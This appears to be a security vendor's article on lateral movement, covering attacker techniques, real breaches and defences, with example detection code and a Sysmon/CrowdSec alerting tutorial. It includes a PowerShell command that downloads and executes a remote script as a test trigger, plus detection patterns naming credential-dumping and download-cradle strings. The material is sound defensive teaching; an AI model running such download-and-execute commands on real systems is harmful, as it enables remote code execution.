When we think about cyberattacks, we generally think of a hacker breaching a system and stealing data in one quick action. But in reality, most modern attacks are far more deliberate and sophisticated. 

Once an attacker gains access to your network, they won’t stop there. Instead, they use that access to move deeper, explore the network, and escalate their control. It’s a methodical process called lateral movement, and it’s how attackers turn a small foothold into a full-blown compromise.

In this article, we’ll explain in detail what lateral movement is, why attackers use it, how it works, and how to detect and prevent it.

What is lateral movement?

Lateral movement refers to the techniques attackers use to move deeper into a network after their initial breach. The goal is to explore and exploit systems, gain higher levels of access, and establish persistence. 

Unlike the initial entry point, lateral movement enables attackers to get into different systems, access sensitive data, and compromise the entire network.


Why attackers use lateral movement

Attackers use lateral movement for three primary reasons.

  • To escalate privileges and gain higher levels of access, so they can control more systems.
  • To reach their ultimate target, which is often financial, operational, or personal information.
  • To make their presence permanent, so they keep access even if the breach is discovered and the initial entry point is secured.

Unlike the initial breach, which might rely on luck or a single weak spot, lateral movement requires strategy and stealth. Attackers use various tools and techniques to blend in and avoid detection, often mimicking legitimate user behavior.

Techniques used in lateral movement

Attackers rely on specific techniques to move across systems, depending on your network’s structure and security measures in place. These tactics are designed to exploit both technical weaknesses and human behavior.

Let’s dig a little deeper into the most common techniques used in lateral movement.

Credential theft and reuse

One of the simplest ways to move laterally is by stealing user credentials. Attackers may trick employees into revealing their usernames and passwords through phishing emails, or they might install keylogging malware to capture what people type. 

Once they have a valid login, they use it to access other systems.

This technique works especially well in environments where passwords are reused across multiple systems, accounts have more privileges than necessary, or multi-factor authentication isn’t enforced.

Pass-the-hash attacks

Not all credentials are stored in plain text. Windows, like most systems, stores a one-way hash of the password rather than the password itself (the NT hash, an unsalted MD4 of the UTF-16LE password). Hashing is not encryption, but attackers don’t need to crack or reverse it either.

In a pass-the-hash attack, they use the stolen hash itself to authenticate with other systems: NTLM challenge-response derives its proof from the hash alone, so the hash is password-equivalent. This is very effective in Windows environments where NTLM authentication is still allowed alongside Kerberos. Disabling NTLM where possible, placing privileged accounts in the Protected Users group, and giving every workstation a unique local administrator password (LAPS) limit how far one dumped hash can carry an attacker.

Remote services exploitation

Remote access tools like Remote Desktop Protocol (RDP), Windows Management Instrumentation (WMI), or Secure Shell (SSH) are very important for IT teams in managing systems.

Unfortunately, they’re also a favorite tool for attackers. By exploiting vulnerabilities in these services or using stolen credentials, attackers can connect to and control systems across your network.

Exploitation of vulnerabilities

Every unpatched system in your network is a potential doorway for attackers. Exploiting vulnerabilities in outdated software is one of the easiest ways for attackers to spread laterally. 

Tools like Metasploit allow attackers to automate this process, quickly identifying and exploiting weaknesses.

Living Off The Land technique

Rather than introducing external tools that might raise alarms, attackers often use legitimate tools already present within your network, a practice known as Living Off The Land (LOTL). PowerShell and PsExec are commonly used as part of this technique.

PowerShell is a powerful scripting language used for administrative tasks, while PsExec is a Sysinternals utility for executing processes on remote systems (not part of a default Windows install, but so widely deployed by administrators that its use rarely looks out of place). LOTL techniques allow attackers to blend into legitimate activity, complicating your detection efforts even further.

Phases of lateral movement

Lateral movement generally happens in five key phases. 


1. Initial access

This is the entry point into the network, and attackers employ various methods to gain access.

  • Tricking users into clicking malicious links or downloading infected files.
  • Targeting weaknesses in software, systems, or exposed services.
  • Using login details obtained through prior breaches or social engineering.

Worth noting here is the existence of certain cybercriminal groups, like the Lapsus$ group, who, in the past, openly tried to recruit disgruntled employees who would provide initial access in exchange for money.

The goal at this stage is to establish a foothold, often on a single endpoint or user account.

2. Discovery

After entering the network, attackers begin to map its structure. This phase involves locating file servers, databases, or systems containing sensitive data, searching for accessible services and systems, and identifying privileged accounts to target.

Attackers lean on legitimate tools such as Nmap, Netstat, or built-in operating system commands to gather this information, which often lets them do so without raising alarms; a noisy network scan is more likely to be noticed than a handful of built-in queries.

3. Escalation of privileges

Privilege escalation is critical for attackers to move beyond the limitations of their initial access to your system. Some of the common methods include taking advantage of weak or improperly applied access controls, using brute force or dictionary attacks, and exploiting flaws in operating systems or applications to elevate privileges.

Once they obtain administrator-level access, attackers gain greater control over the network.

4. Lateral movement

This phase is when attackers move between systems within your network to achieve their objectives. They usually achieve that by logging into multiple systems with stolen or compromised credentials, authenticating with hash values instead of plaintext passwords, or misusing tools like RDP or WMI to connect to additional systems.

Stealth is critical during lateral movement, as attackers aim to avoid detection while expanding their reach.

5. Persistence

To ensure they can maintain access, attackers plant mechanisms for persistence. Installing backdoors or remote access tools, creating unauthorized accounts with administrative privileges, or modifying system configurations to avoid detection are some of the most common techniques used during this phase.

These measures allow attackers to return even if their initial breach is discovered and addressed.

Consequences of successful lateral movement

Lateral movement is often the turning point that amplifies the damage attackers can cause. By successfully moving through your network, attackers gain access to your most valuable systems and data, leaving your organization with far-reaching consequences.

Data breaches and theft of sensitive information

When attackers successfully move laterally, they can access and exfiltrate sensitive data stored deep within your network, including:

  • personally identifiable information (PII), financial records, and login credentials
  • proprietary designs, research data, or trade secrets
  • emails and confidential documents

Data breaches not only lead to direct financial losses but also result in legal fines and regulatory penalties. For example, under the GDPR in Europe or CCPA in California, organizations can face millions of dollars in penalties for failing to protect sensitive data. 

To put these consequences into context, let’s look at some real-world examples.

The SolarWinds breach in 2020 is one of the most sophisticated examples of lateral movement in recent years. Attackers compromised SolarWinds’ Orion software update mechanism, allowing them to distribute malicious updates to thousands of customers. Once inside the networks, the attackers moved laterally to access sensitive data, including emails and internal documents, from high-profile organizations like Microsoft, the U.S. Department of Homeland Security, and FireEye. The SolarWinds breach highlights the risks of supply chain attacks and the ease with which attackers can move laterally across interconnected systems once a trusted component is compromised.

In another example from 2021, T-Mobile suffered a breach where attackers used lateral movement to access customer data, including names, Social Security numbers, and driver’s license information, affecting over 50 million individuals. The breach resulted in multiple class-action lawsuits and a $350 million settlement, along with significant reputational damage.

Compromise of critical systems and infrastructure

When attackers compromise critical systems, they can disrupt operations, causing downtime and financial losses. 

In industries like healthcare or utilities, this can have life-threatening implications. Looking at real-world examples here, unfortunately, we have no shortage of incidents. 

The Colonial Pipeline ransomware attack in 2021 is a prime example of lateral movement leading to the compromise of critical infrastructure. Attackers used a stolen VPN password to access the network and then moved laterally to deploy ransomware on critical systems. This forced the company to shut down its pipeline operations, causing fuel shortages across the U.S. East Coast and resulting in a $4.4 million ransom payment.

Also in 2021, JBS Foods, one of the world’s largest meat processing companies, fell victim to a ransomware attack that involved lateral movement across its network. The attackers disrupted operations in the U.S., Australia, and Canada, forcing the company to shut down production facilities. JBS paid an $11 million ransom to restore operations, highlighting the vulnerability of critical supply chains to lateral movement attacks.

While slightly older, the Norsk Hydro attack of 2019 remains a relevant example. The aluminum manufacturer was hit by the LockerGoga ransomware, which spread laterally across its network, forcing the company to shut down production and switch to manual operations. The attack caused an estimated $40 million in losses and disrupted global aluminum supplies.

Financial losses and operational disruptions

The financial toll of lateral movement is significant and multifaceted.

Successful lateral movement can cause expenses related to containing the breach, such as hiring forensic investigators, legal counsel, and incident response teams. Also, operational downtime often results in halted sales, missed deadlines, and dissatisfied customers. Regulatory penalties, as mentioned earlier, are compounded by potential class-action lawsuits from affected customers or partners.

For small and medium-sized businesses, these costs can be devastating, sometimes leading to bankruptcy. Even larger enterprises can feel the strain.

Two real-world incidents from 2021 we should mention here are the Kaseya and the Acer ransomware attacks.

The Kaseya ransomware attack involved lateral movement through the company’s VSA software, which is used by managed service providers (MSPs). The attackers, affiliated with the REvil ransomware group, encrypted the systems of over 1,500 businesses worldwide. The incident caused widespread operational disruptions and financial losses, with Kaseya eventually obtaining a universal decryption key to help affected customers recover.

Acer was also hit by a ransomware attack where attackers demanded a record-breaking $50 million ransom. The attackers used lateral movement to compromise Acer’s systems and exfiltrate sensitive data. While Acer did not confirm whether it paid the ransom, the attack highlighted the growing financial risks associated with lateral movement.

Reputational damage and loss of customer trust

Beyond fines, the loss of customer trust often translates into reduced revenue as clients take their business elsewhere.

Public perception can make or break a company, especially in the wake of a cyberattack. When news of a breach spreads, customers, partners, and stakeholders begin to question the organization’s commitment to security. 

The effects are particularly pronounced when the breach involves the mishandling of sensitive data, there are delays in notifying customers or regulators, or when competitors manage to capitalize on the breach to gain market share.

For many organizations, reputational damage outlasts the technical and financial impacts of an attack, highlighting the importance of proactive measures to prevent lateral movement.

In September 2022, Uber suffered a breach where an attacker gained access to its internal systems using stolen contractor credentials and then moved laterally to reach sensitive internal systems, including internal communications and other internal data. The breach raised concerns about Uber’s security practices and led to renewed scrutiny from regulators and customers.

Last but not least, in November 2021, Robinhood disclosed a breach where attackers used social engineering to gain access to its systems and then moved laterally to access customer data, including names, email addresses, and phone numbers. While no financial data was stolen, the breach damaged Robinhood’s reputation, which was already under scrutiny following the GameStop trading controversy earlier that year.

Detecting and preventing lateral movement

While lateral movement is designed to evade detection, you can identify and stop it if you employ a few active strategies.

Detection techniques

Detecting lateral movement requires you to focus on unusual activity within your network. 

Monitoring network traffic can reveal unusual patterns, such as data transfers to unfamiliar destinations or repeated login attempts from unexpected locations, that signal lateral movement. Anomalies like accessing systems at odd hours or from previously unseen IP addresses are also indicators of a breach.

Security Information and Event Management (SIEM) platforms aggregate logs from servers, endpoints, firewalls, and other devices, providing a centralized view of network activity. Correlating those events lets you identify suspicious behaviors that a single log would not show, such as a burst of failed login attempts followed by a successful one, or one account authenticating to many hosts in a short window.
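As an added illustration of the kind of correlation described above (example code, not part of the original article and not any SIEM vendor's logic), the script below runs two rules over a constructed set of normalised Windows Security events: a burst of failed logons (4625) followed by a success (4624) for the same account, and one account successfully authenticating to several distinct hosts over the network within a short window. Thresholds, field names and the sample events are assumptions chosen for the demonstration.

```python
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed sample records in the shape of Windows Security log events after SIEM normalisation.
# 4625 = failed logon, 4624 = successful logon; LogonType 3 = network (SMB/WMI/PsExec), 10 = RDP, 2 = interactive.
SAMPLE_EVENTS = [
    # svc_backup: six failures from one workstation, then a success (guessing followed by use)
    *[{"time": f"2024-03-01T02:10:{5 + 4 * i:02d}", "id": 4625, "user": "svc_backup",
       "src": "10.0.5.23", "dst": "FS01", "type": 3} for i in range(6)],
    {"time": "2024-03-01T02:11:00", "id": 4624, "user": "svc_backup", "src": "10.0.5.23", "dst": "FS01", "type": 3},
    # jdoe: one account reaching four different servers in seven minutes from the same source
    {"time": "2024-03-01T02:20:00", "id": 4624, "user": "jdoe", "src": "10.0.5.23", "dst": "WS-PAY01", "type": 3},
    {"time": "2024-03-01T02:22:00", "id": 4624, "user": "jdoe", "src": "10.0.5.23", "dst": "FS01", "type": 3},
    {"time": "2024-03-01T02:25:00", "id": 4624, "user": "jdoe", "src": "10.0.5.23", "dst": "DC01", "type": 10},
    {"time": "2024-03-01T02:27:00", "id": 4624, "user": "jdoe", "src": "10.0.5.23", "dst": "SQL01", "type": 3},
    # alice: an ordinary morning, interactive logon then one file-server access
    {"time": "2024-03-01T09:00:00", "id": 4624, "user": "alice", "src": "10.0.7.11", "dst": "WS-ALICE", "type": 2},
    {"time": "2024-03-01T09:05:00", "id": 4624, "user": "alice", "src": "10.0.7.11", "dst": "FS01", "type": 3},
    # bob: two typos then success, below the threshold
    {"time": "2024-03-01T09:30:00", "id": 4625, "user": "bob", "src": "10.0.7.12", "dst": "FS01", "type": 3},
    {"time": "2024-03-01T09:30:10", "id": 4625, "user": "bob", "src": "10.0.7.12", "dst": "FS01", "type": 3},
    {"time": "2024-03-01T09:30:20", "id": 4624, "user": "bob", "src": "10.0.7.12", "dst": "FS01", "type": 3},
]


@dataclass(frozen=True)
class Finding:
    rule: str
    user: str
    detail: str


def _by_user(events, keep):
    """Group events per account, sorted by time, keeping only those matching keep()."""
    grouped = defaultdict(list)
    for e in sorted(events, key=lambda e: e["time"]):
        if keep(e):
            grouped[e["user"]].append(dict(e, time=datetime.fromisoformat(e["time"])))
    return grouped


def detect_failures_then_success(events, min_failures=5, window=timedelta(minutes=10)):
    """Rule 1: at least min_failures 4625 events for an account within window before a 4624."""
    findings = []
    for user, evs in _by_user(events, lambda e: e["id"] in (4624, 4625)).items():
        for i, e in enumerate(evs):
            if e["id"] != 4624:
                continue
            failures = [f for f in evs[:i] if f["id"] == 4625 and e["time"] - f["time"] <= window]
            if len(failures) >= min_failures:
                findings.append(Finding("failed_logons_then_success", user,
                                        f"{len(failures)} failures from {e['src']} before success on {e['dst']}"))
                break  # one finding per account is enough for triage
    return findings


def detect_account_fan_out(events, min_hosts=3, window=timedelta(minutes=15)):
    """Rule 2: one account with successful network/RDP logons to min_hosts distinct hosts within window."""
    findings = []
    for user, evs in _by_user(events, lambda e: e["id"] == 4624 and e["type"] in (3, 10)).items():
        for i, start in enumerate(evs):
            hosts = {e["dst"] for e in evs[i:] if e["time"] - start["time"] <= window}
            if len(hosts) >= min_hosts:
                findings.append(Finding("account_fan_out", user,
                                        f"{len(hosts)} distinct hosts within {window}: {sorted(hosts)}"))
                break
    return findings


def run_detections(events):
    return detect_failures_then_success(events) + detect_account_fan_out(events)


if __name__ == "__main__":
    for finding in run_detections(SAMPLE_EVENTS):
        print(f"[{finding.rule}] {finding.user}: {finding.detail}")
```

Neither rule needs anything beyond the logon events most organisations already forward; the value comes from correlating across time and across hosts, which is exactly what a single endpoint's log cannot do.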

Employing behavioral analysis is another technique that can help security teams detect threats even when attackers use legitimate credentials to move laterally. Solutions like the CrowdSec Security Engine analyze user behavior, flagging anomalies such as a standard user account suddenly accessing administrative resources.

Deploying honeypots, such as decoy systems, accounts, or files that no legitimate user should ever touch, gives you a high-signal tripwire. Any interaction with these decoys provides early warning of lateral movement.

Prevention strategies

The best defense against lateral movement is to stop it before it starts. Prevention focuses on reducing an attacker’s ability to navigate the network or gain the access they need.

Network segmentation is critical here. Networks should be divided into smaller, isolated segments so that critical systems like servers and databases remain segregated from employee workstations. Micro-segmentation takes this a notch higher, creating secure zones within each segment to restrict movement even more tightly.

Use the principle of least privilege to limit user and system access to only what is necessary for their roles. For example, an employee in marketing should not have access to financial systems. Regularly review permissions to ensure they remain appropriate.

As attackers frequently exploit vulnerabilities in outdated software, regular updates and patching are essential. Implementing a robust patch management process ensures these weaknesses are addressed promptly. Prioritize critical updates that close known exploits, especially in systems that are part of your network’s infrastructure.

Another handy tool in your fight against lateral movement is the adoption of Endpoint Detection and Response (EDR) tools that monitor endpoints like laptops, desktops, and servers for suspicious activity. They can detect threats such as credential dumping or unauthorized file access. EDR solutions can stop lateral movement before it escalates as they respond to threats in real time.

Regular penetration testing can also help you avoid devastating incidents. Simulated attacks can help identify vulnerabilities and areas where attackers might move laterally. Penetration tests not only reveal technical gaps but also evaluate your team’s ability to detect and respond to real threats.

And let’s not forget the critical impact proper employee training and awareness can have on effectively preventing lateral movement. Employees are often the first line of defense. Regularly educate them about common attack methods, such as phishing, and the importance of strong passwords. Simulated phishing campaigns can test employees’ ability to spot suspicious emails and reinforce training.

Detecting lateral movement using an IDPS

Now that you are familiar with the fundamentals of lateral movement, let’s put theory into practice and see how you can successfully detect lateral movement. 

For this short tutorial, we will be using the CrowdSec Security Engine, CrowdSec’s behavior-based IDPS, in a Windows environment. Since version 1.6.4, the Security Engine can detect lateral movement thanks to the windows_proc_creation collection.


This collection contains scenarios that were imported from the SigmaHQ project.

Those scenarios focus on detecting strange or anomalous process creation on a Windows machine (e.g., a mimikatz process has been created, or a lolbin has been executed).
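To show what such a scenario does, here is an added example (not CrowdSec's parser, not the SigmaHQ rules, and not part of the original article): a minimal Sigma-style matcher applied to constructed Sysmon Event ID 1 records. The rules, the simplified modifier syntax (`endswith`, `contains`, `all`) and both sample events are assumptions written for this demonstration; the alert it builds reuses the ParentProcessId scope and the User/CommandLine/ParentImage fields that the tutorial's Slack template reads.

```python
import xml.etree.ElementTree as ET

NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"

# Constructed Sysmon Event ID 1 record for the download cradle used later in the tutorial (fields trimmed).
DOWNLOAD_CRADLE_EVENT = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>1</EventID><Computer>WS-ALICE</Computer></System>
  <EventData>
    <Data Name="Image">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
    <Data Name="CommandLine">powershell.exe "(New-Object Net.WebClient).DownloadString('https://example.invalid/foo.ps1') | IEX"</Data>
    <Data Name="User">CORP\alice</Data>
    <Data Name="CurrentDirectory">C:\Users\alice\</Data>
    <Data Name="ParentImage">C:\Windows\explorer.exe</Data>
    <Data Name="ParentProcessId">4212</Data>
  </EventData>
</Event>"""

# Constructed benign record: same binary, ordinary administrative command line.
BENIGN_EVENT = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>1</EventID><Computer>WS-ALICE</Computer></System>
  <EventData>
    <Data Name="Image">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
    <Data Name="CommandLine">powershell.exe -NoProfile -Command "Get-ChildItem C:\Logs | Measure-Object"</Data>
    <Data Name="User">CORP\alice</Data>
    <Data Name="CurrentDirectory">C:\Users\alice\</Data>
    <Data Name="ParentImage">C:\Windows\explorer.exe</Data>
    <Data Name="ParentProcessId">4212</Data>
  </EventData>
</Event>"""

# Simplified Sigma-like rules: "Field|modifier[|all]": [values]. All keys of a rule must match.
RULES = [
    {"title": "PowerShell download cradle",
     "Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
     "CommandLine|contains|all": ["downloadstring", "iex"]},
    {"title": "Mimikatz module on the command line",
     "CommandLine|contains": ["sekurlsa::", "lsadump::"]},
    {"title": "Office application spawning a shell",
     "ParentImage|endswith": ["\\winword.exe", "\\excel.exe", "\\outlook.exe"],
     "Image|endswith": ["\\cmd.exe", "\\powershell.exe", "\\wscript.exe"]},
]


def parse_sysmon_event(xml_text: str) -> dict:
    """Flatten a Sysmon event into {EventID, Computer, <EventData Name>: value}."""
    root = ET.fromstring(xml_text)
    event = {"EventID": root.findtext(f"{NS}System/{NS}EventID"),
             "Computer": root.findtext(f"{NS}System/{NS}Computer")}
    for data in root.iter(f"{NS}Data"):
        event[data.get("Name")] = data.text or ""
    return event


def _field_matches(value: str, modifiers: list, needles: list) -> bool:
    value = value.lower()  # Sigma string matching is case-insensitive
    if "endswith" in modifiers:
        hits = [value.endswith(n.lower()) for n in needles]
    elif "startswith" in modifiers:
        hits = [value.startswith(n.lower()) for n in needles]
    else:
        hits = [n.lower() in value for n in needles]
    return all(hits) if "all" in modifiers else any(hits)


def match_rules(event: dict, rules=RULES) -> list:
    """Titles of every rule whose selections all match this process-creation event."""
    if event.get("EventID") != "1":
        return []
    matched = []
    for rule in rules:
        selections = [(k, v) for k, v in rule.items() if k != "title"]
        if all(_field_matches(event.get(key.split("|")[0], ""), key.split("|")[1:], needles)
               for key, needles in selections):
            matched.append(rule["title"])
    return matched


def build_alert(event: dict, rules=RULES) -> dict:
    """Alert shaped like the tutorial's notification: scope ParentProcessId plus the meta fields the template reads."""
    titles = match_rules(event, rules)
    if not titles:
        return {}
    return {"scenario": titles[0], "scope": "ParentProcessId", "value": event.get("ParentProcessId", ""),
            "machine": event.get("Computer", ""),
            "meta": {k: event.get(k, "") for k in ("User", "CurrentDirectory", "CommandLine", "ParentImage")}}


if __name__ == "__main__":
    for raw in (DOWNLOAD_CRADLE_EVENT, BENIGN_EVENT):
        print(build_alert(parse_sysmon_event(raw)) or "no match")
```

Matching on the command line rather than on the binary name is what lets a rule like this catch a LOTL technique: powershell.exe itself is legitimate on every workstation, so it is the download-and-execute pattern that is anomalous, not the process.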

Configuring sysmon

The Security Engine relies on sysmon to detect new process creation. Sysmon is a very powerful tool, and for the sake of simplicity, we’ll use an already-existing configuration created by the community.

After downloading sysmon and extracting the archive, you’ll need to run it from an admin shell.


.\Sysmon64.exe -i -accepteula -c \path\to\sysmonconfig-export.xml

Warning: Once Sysmon has been started for the first time, you will not be able to stop the service, and it will start automatically on boot. The only way to disable it is to fully uninstall it (Sysmon64.exe -u from an admin shell).

Installing the Crowdsec Security Engine

To install the Security Engine on Windows, go to our release page, download, and run the MSI installer.

You’ll need to update the default configuration for the Security Engine to watch the logs generated by Sysmon, in particular the process creation logs (Event ID 1). Edit the acquisition config in %PROGRAMDATA%\CrowdSec\config\acquis.yaml and add the following. If the file already contains a data source, separate the new entry from the previous one with a line containing only ---, since the file is a sequence of YAML documents:


source: wineventlog
pretty_name: sysmon
event_channel: "Microsoft-Windows-Sysmon/Operational"
event_ids:
 - 1
labels:
 type: sysmon

You’ll now need to install the windows_proc_creation collection to add the scenarios in the Security Engine from an admin shell.


cscli.exe collections install sigmahq/windows_proc_creation

This will download and enable all the scenarios and sysmon parser from the collection.

Finally, you need to configure the Security Engine to notify you when a suspicious process is created. To do this, use the built-in notification capabilities of the Security Engine; for this example, we’ll be using the Slack notification plugin.

First, you need to configure your profiles to send a notification when a suspicious process creation is detected. In %PROGRAMDATA%\CrowdSec\config\profiles.yaml, add this snippet at the end:


---
name: sysmon_slack_notif
filters:
 - Alert.Remediation == false && Alert.GetScope() == "ParentProcessId"
on_success: break
notifications:
 - slack_default

Note that we are filtering on the ParentProcessId scope, which is explicitly set by the various sysmon scenarios.

You now need to configure the Slack plugin itself. You’ll need a new template, and to set your Slack webhook URL. Edit %PROGRAMDATA%\CrowdSec\config\notifications\slack.yaml with the following content:


type: slack           # Don't change
name: slack_default   # Must match the registered plugin in the profile
log_level: info
format: |
  {{range . -}}
  {{$alert := . -}}
  Detected suspicious execution on machine '{{$alert.MachineID}}': {{$alert.GetScenario}}
  User: {{ index (GetMeta $alert "User") 0  }}
  Directory:  {{ index (GetMeta $alert "CurrentDirectory") 0  }}
  Command Line:  {{ index (GetMeta $alert "CommandLine") 0  }}
  Parent Process: {{ index (GetMeta $alert "ParentImage") 0  }} (PID: {{$alert.GetValue}})
  {{end -}}

webhook: https://hooks.slack.com/services/XXXXXXXXX

Finally, restart the Security Engine from an admin shell:


Restart-Service crowdsec

Time for testing!

Now, you just have to trigger one of the scenarios to make sure everything is working. To keep things simple for this example, we’ll just attempt to download a ps1 file and then execute it with PowerShell (run this on a test machine, against a URL you control):


powershell.exe "(New-Object Net.WebClient).DownloadString('https://XXXX/foo.ps1') | IEX;RunBadCommand"

As soon as this command runs, the Security Engine will log an alert, as seen below; you can also list it with cscli.exe alerts list from an admin shell.

A notification will also be sent to the Slack webhook.

And you are all set! 

You will now be notified whenever a process creation matches one of the collection’s scenarios, giving you an early signal of lateral movement so you can investigate and contain it before the attacker does serious damage. Note that this profile only notifies (Alert.Remediation == false in the filter): it does not block anything by itself. Simple, isn’t it?

